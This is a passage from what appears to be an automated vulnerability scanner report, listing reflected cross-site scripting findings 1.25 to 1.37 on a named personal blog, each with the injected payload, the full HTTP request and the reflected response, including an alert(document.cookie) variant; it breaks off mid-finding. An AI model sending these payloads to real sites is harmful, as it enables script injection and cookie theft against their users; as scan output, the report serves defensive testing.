This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?96792"><script>alert(1)</script>e6f5e4a121f=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=30f944fb8c0472d1829671af23f2bad5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/?96792\"><script>alert(1)</script>e6f5e4a121f=1"/>
...[SNIP]...

1.25. http://addyosmani.com/blog/essentialjsdesignpatterns/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/essentialjsdesignpatterns/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70566"><script>alert(1)</script>e9d89fba107 was submitted in the REST URL parameter 2. This input was echoed as 70566\"><script>alert(1)</script>e9d89fba107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/essentialjsdesignpatterns70566"><script>alert(1)</script>e9d89fba107/ HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:26:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ec17ae947de819386fe37699933b582e; path=/
Last-Modified: Wed, 09 Feb 2011 13:26:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/essentialjsdesignpatterns70566\"><script>alert(1)</script>e9d89fba107/"/>
...[SNIP]...

1.26. http://addyosmani.com/blog/essentialjsdesignpatterns/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/essentialjsdesignpatterns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e263"><script>alert(1)</script>5b3cd140196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e263\"><script>alert(1)</script>5b3cd140196 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/essentialjsdesignpatterns/?1e263"><script>alert(1)</script>5b3cd140196=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=1685>; rel=shortlink
Set-Cookie: PHPSESSID=e6b348a66c2f9b345871a175b8423572; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/essentialjsdesignpatterns/?1e263\"><script>alert(1)</script>5b3cd140196=1"/>
...[SNIP]...

1.27. http://addyosmani.com/blog/video-jquerysub-explained/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83d0"><script>alert(1)</script>01527fc4429 was submitted in the REST URL parameter 2. This input was echoed as b83d0\"><script>alert(1)</script>01527fc4429 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explainedb83d0"><script>alert(1)</script>01527fc4429/ HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:26:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e0ffb189850799aad2ff388ee6386d0b; path=/
Last-Modified: Wed, 09 Feb 2011 13:26:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explainedb83d0\"><script>alert(1)</script>01527fc4429/"/>
...[SNIP]...

1.28. http://addyosmani.com/blog/video-jquerysub-explained/ [d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The value of the d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bacd2"><script>alert(1)</script>7fca595e38e was submitted in the d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada parameter. This input was echoed as bacd2\"><script>alert(1)</script>7fca595e38e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1bacd2"><script>alert(1)</script>7fca595e38e HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103; __utmz=15855846.1297258315.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=15855846.1800733643.1297258315.1297258315.1297258315.1; __utmc=15855846; __utmb=15855846.1.10.1297258315; __qca=P0-724382038-1297258315164

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:31:48 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=2456>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 43420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1bacd2\"><script>alert(1)</script>7fca595e38e"/>
...[SNIP]...

1.29. http://addyosmani.com/blog/video-jquerysub-explained/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d182c"><script>alert(1)</script>8aad83cada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d182c\"><script>alert(1)</script>8aad83cada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explained/?d182c"><script>alert(1)</script>8aad83cada=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=2456>; rel=shortlink
Set-Cookie: PHPSESSID=3a0c84f3ca5b4d97aa560d444345daf6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained/?d182c\"><script>alert(1)</script>8aad83cada=1"/>
...[SNIP]...

1.30. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e97e5"><script>alert(1)</script>252c8af24fe was submitted in the REST URL parameter 2. This input was echoed as e97e5\"><script>alert(1)</script>252c8af24fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente97e5"><script>alert(1)</script>252c8af24fe/plugins/wp-pagenavi/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-contente97e5\"><script>alert(1)</script>252c8af24fe/plugins/wp-pagenavi/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.31. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9229d"><script>alert(1)</script>3897cff0b68 was submitted in the REST URL parameter 3. This input was echoed as 9229d\"><script>alert(1)</script>3897cff0b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins9229d"><script>alert(1)</script>3897cff0b68/wp-pagenavi/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins9229d\"><script>alert(1)</script>3897cff0b68/wp-pagenavi/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.32. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dc5"><script>alert(1)</script>a8c9d308cd2 was submitted in the REST URL parameter 4. This input was echoed as 83dc5\"><script>alert(1)</script>a8c9d308cd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-pagenavi83dc5"><script>alert(1)</script>a8c9d308cd2/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi83dc5\"><script>alert(1)</script>a8c9d308cd2/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.33. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e855"><script>alert(1)</script>e2d582ad4e4 was submitted in the REST URL parameter 5. This input was echoed as 8e855\"><script>alert(1)</script>e2d582ad4e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css8e855"><script>alert(1)</script>e2d582ad4e4?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css8e855\"><script>alert(1)</script>e2d582ad4e4?ver=2.50"/>
...[SNIP]...

1.34. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d9a"><script>alert(1)</script>dbc41bfa2ac was submitted in the REST URL parameter 2. This input was echoed as e0d9a\"><script>alert(1)</script>dbc41bfa2ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente0d9a"><script>alert(1)</script>dbc41bfa2ac/plugins/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-contente0d9a\"><script>alert(1)</script>dbc41bfa2ac/plugins/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.35. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6edf0"><script>alert(1)</script>d9d00838e01 was submitted in the REST URL parameter 3. This input was echoed as 6edf0\"><script>alert(1)</script>d9d00838e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins6edf0"><script>alert(1)</script>d9d00838e01/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins6edf0\"><script>alert(1)</script>d9d00838e01/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.36. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e63c"><script>alert(1)</script>41a4f61ec80 was submitted in the REST URL parameter 4. This input was echoed as 3e63c\"><script>alert(1)</script>41a4f61ec80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-postviews3e63c"><script>alert(1)</script>41a4f61ec80/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-postviews3e63c\"><script>alert(1)</script>41a4f61ec80/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.37. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
